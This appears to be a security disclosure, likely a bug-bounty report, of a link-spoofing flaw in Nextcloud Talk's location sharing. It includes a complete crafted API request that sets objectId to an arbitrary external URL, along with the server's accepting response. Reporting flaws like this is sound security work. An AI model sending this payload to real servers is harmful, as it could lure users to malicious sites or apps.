The NextCloud Talk app allows a user to share their location in the Mobile App.
The objectId= in /ocs/v2.php/apps/spreed/api/v1/chat/$token/share
Can be set to a URL or Deeplink, While the metaData=
will render the map, Once a user clicked the map it will open the defined URL or Deeplink in the crafted request.
For days, I’ve been thinking and trying different ways to Increase its Severity but i guess im stuck so here i am Reporting this.
Note: Location Sharing is only allowed in the Mobile App.
Request
Below.objectId=
to whatever URL you want to point it at.[list any additional material (e.g. screenshots, logs, etc.)]
POST /ocs/v2.php/apps/spreed/api/v1/chat/wqfqmw9n/share HTTP/2
Host: localhost
Cookie: oc_sessionPassphrase=cookie; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; occi3pyo3vg0=6lheeis7ot8kcnvdgq12ijl90e
Authorization: Basic
User-Agent: Mozilla/5.0 (Android) Nextcloud-Talk v12.2.1
Accept: application/json
Ocs-Apirequest: true
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
Accept-Encoding: gzip, deflate
objectType=geo-location&objectId=https://ctulhu.me&referenceId=kkk&metaData={"type":"geo-location","id":"geo:14.600765443470294,121.00452968052457","latitude":"14.600765443470294","longitude":"121.00452968052457","name":"hehe"}
HTTP/2 201 Created
Date: Sat, 11 Sep 2021 17:30:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 509
Expires: Thu, 19 Nov 1981 08:52:00 GMT
{"ocs":{"meta":{"status":"ok","statuscode":201,"message":"OK"},"data":{"id":237,"token":"wqfqmw9n","actorType":"users","actorId":"secret","actorDisplayName":"secret","timestamp":1631381422,"message":"{object}","messageParameters":{"actor":{"type":"user","id":"secret","name":"secret"},"object":{"type":"geo-location","id":"https:\/\/ctulhu.me","latitude":"14.600765443470294","longitude":"121.00452968052457","name":"hehe"}},"systemMessage":"","messageType":"comment","isReplyable":true,"referenceId":"kkk"}}}
A attacker can abuse this to fool the user to open a malicious url or 3rd party app.